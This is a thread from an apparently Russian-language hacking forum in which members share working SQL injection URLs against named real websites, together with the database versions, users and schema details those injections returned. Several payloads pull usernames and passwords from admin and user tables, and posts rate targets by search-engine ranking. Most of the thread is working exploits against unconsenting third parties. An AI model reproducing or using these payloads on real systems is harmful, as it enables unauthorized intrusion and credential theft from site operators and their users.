SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    854
    Reputations:
    857
    Молодёжь нынче не та =/ Всё на программы перекладывают...

    А по сути всё просто

    Code:
    http://computeremuzone.com/ficha.php?id=9999+union+select+version(),2,3,4,5,6--
    Current User: crisis@cgi1501.int.bizland.net
    Sql Version: 5.0.91-log
    Current DB: emuzonedb
    Data Bases: information_schema
    emuzonedb
     
    _________________________
  2. eclipse92

    eclipse92 Banned

    Joined:
    17 Jan 2011
    Messages:
    0
    Likes Received:
    1
    Reputations:
    -11
    http://www.dkggroup.com/main.php?id=121'

    http://www.dkggroup.com/main.php?id=-121+union+all+select+1,group_concat(Username,0x3a,Password,0x3a,UserGroup),3,4,5+from+uvp_Users
     
  3. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    63
    Reputations:
    34
    тИЦ: 1600
    Code:
    http://www.solvex.ru/hot/list.php?uid=-22+union+select+1,concat_ws(0x3a,version(),database(),user()),3--+
    ver 5.1.39
    db solvexmdb
    user root@localhost
    file_priv y, mq = on :(
     
  4. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    980
    Likes Received:
    525
    Reputations:
    173
    тиц 850

    первенец
     
    1 person likes this.
  5. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Учреждение Российской Академии Наук Институт Биологического Приборостроения

    http://www.ibp-ran.ru/catalog.php?trid=-203%20and%201=2%20union%20select%201,2,3,4,5,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),7,8,9,10,11,12,13,14,15,16+--

    4.0.27-log pse101@v27.valuehost.ru pse101 portbld-freebsd7.1
     
  6. Kerny

    Kerny Member

    Joined:
    18 Nov 2009
    Messages:
    37
    Likes Received:
    9
    Reputations:
    1
    Уязвимость существует в get запросе http://www.bryansktel.ru/news/?idnews=121 из-за недостаточной фильтрации переменной idnews.

    select+concat(login,0x3a,password,0x3a,level)+from+admins+limit+0,1
     
    #14206 Kerny, 2 Oct 2011
    Last edited by a moderator: 3 Oct 2011
  7. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,419
    Likes Received:
    814
    Reputations:
    848
    grafrru_turkupon@localhost:5.1.50-lk-log:grafrru_turkupon

    fisheru@localhost:5.0.26-lk-log:fisheru

    stomkosmos@localhost:5.0.26-log:stomkosmos

    leohausru@localhost:5.0.26-log:leohausru

    art@localhost:5.1.58:art-reklama
     
    _________________________
  8. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    365
    Likes Received:
    189
    Reputations:
    92
    Code:
    http://[B]kaluga.pizdec.net[/B]/downloadmp3/mp3.php?album_id=[COLOR=Red]-[/COLOR]1635978+[COLOR=Red]union+Select+1,2,3,4,5,6,group_concat%28table_name+separator+0x3a%29,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59+from+information_schema.tables+where+table_schema=0x7a697073--[/COLOR]
    version: 5.0.77
    database: zips
    user: zips@localhost
    Code:
    http://[B]foroli4ka.org.ua[/B]/aforism/index.php?id=1+[COLOR=Red]and+substring%28@@version,1,1%29=5 [/COLOR][COLOR=Yellow]//true[/COLOR]
     
    1 person likes this.
  9. N@b$ter

    N@b$ter Elder - Старейшина

    Joined:
    6 Oct 2009
    Messages:
    294
    Likes Received:
    71
    Reputations:
    20
    PHP:
    http://www.kitana.ru/razdel.php?id=-1+union+select+1,2,3,group_concat(column_name+separator+%27%3Cbr%3E%27)+from+information_schema.columns+where+table_schema=%27kitanaru%27+and+table_name=%27user_profile%27--+
    version - 5.0.45
    kitanaru@localhost
    тиц - 20
    пр - 3
     
  10. good.god

    good.god Member

    Joined:
    23 Nov 2009
    Messages:
    283
    Likes Received:
    33
    Reputations:
    0
    Code:
    http://www.easyincometoday.co.uk/shop/ViewItem.php?ItemID=1'+and+1=0+union+select+1,group_concat(version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
    5.0.51a-3ubuntu5:easyincome
     
  11. AHTNkiller

    AHTNkiller New Member

    Joined:
    7 Sep 2011
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    http://www.autodostavka.ru/index.php?id=729&model=-981%20UNION%20ALL%20SELECT%201,2,3,4,5,6,group_concat%28username,password%29,8,9,10,11,12%20from%20regusers
     
  12. tght

    tght Member

    Joined:
    24 Jun 2010
    Messages:
    156
    Likes Received:
    10
    Reputations:
    0
    http://shownewstv.ru/taunew/index.php?id=5227-999.9+union+select+1,2,3,4,version(),6,7,8,user(),10,database(),12,13,14,15,16,17--

    5.1.49-1ubuntu8.1

    shownews@localhost

    DB: wwwshownewstvru

    http://avtozapchasty.ru/shop/i.php?id=288821-999.9+union+select+1,2,version(),4,5,6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

    5.5.16-log 6

    cck135@WIN-BZW07G9C3OB
     
    #14212 tght, 6 Oct 2011
    Last edited: 6 Oct 2011
  13. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    Code:
    http://faq.freecity.de/support/faq_showfaq.phtml?id=-85+union+select+1,version()+--+&katname=K%C3%BCndigung
    4.0.24_Debian-10sarge2-log
    pr4
    alexa 384,252
     
  14. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    Code:
    http://www.salue.de/nachrichten/message.phtml?id=-14895+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12,13,14,15,16,17,18,19,20,21+--+
    pr 5
    alexa 272,965
     
  15. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Code:
    http://roston.cz/czechdjs/?section=karta&id=1+and+1=2+union+select+1,2,3,4,5,6,user(),0x61,9,10,11,12,13,14,version(),database(),17,18,19+--+
    так же идет opendir('foto/' . $_GET['id']), и инклудится файл inc-kalendar-10-2011.txt.
     
  16. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    ГАЗклуб:
    Code:
    http://www.gazclub.ru/faq/?mess_id=-1+union+select+null,mysql.user.password,null,null+from+mysql.user
    
    u9884_2'@'10.8.1.198

    PageRank - 0
    Yandex тИЦ - 120
     
  17. 0x1d

    0x1d New Member

    Joined:
    4 Oct 2011
    Messages:
    14
    Likes Received:
    1
    Reputations:
    0
    http://www.danielbank.kiev.ua/index.php?action=news&type=det&id=79{SQLINJ}

    MySQL 5.2.2.

    DataBase: danielbank
     
  18. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,419
    Likes Received:
    814
    Reputations:
    848
    Old School CMS 2010
    root@vsevbanu.ru:5.0.51a-24+lenny4-log:vvb

    Уязвимость пресутствует из-за отсутствия фильтрации данных в парамитре ID

    post.php

     
    _________________________
    #14218 winstrool, 10 Oct 2011
    Last edited: 10 Oct 2011
    4 people like this.
  19. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    http://www.showbilet.ru/index.php?nav=1&page=3&id=-10%20and%201=2%20union%20select%201,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),3,4,5,6,7,8,9,10--

    4.0.27-log showbile@v27.valuehost.ru showbile portbld-freebsd7.1
     
    2 people like this.
  20. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    тиЦ 20 PR 2
    dexx@localhost:5.0.51a-24+lenny5:dex
     
    2 people like this.
Loading...
Thread Status:
Not open for further replies.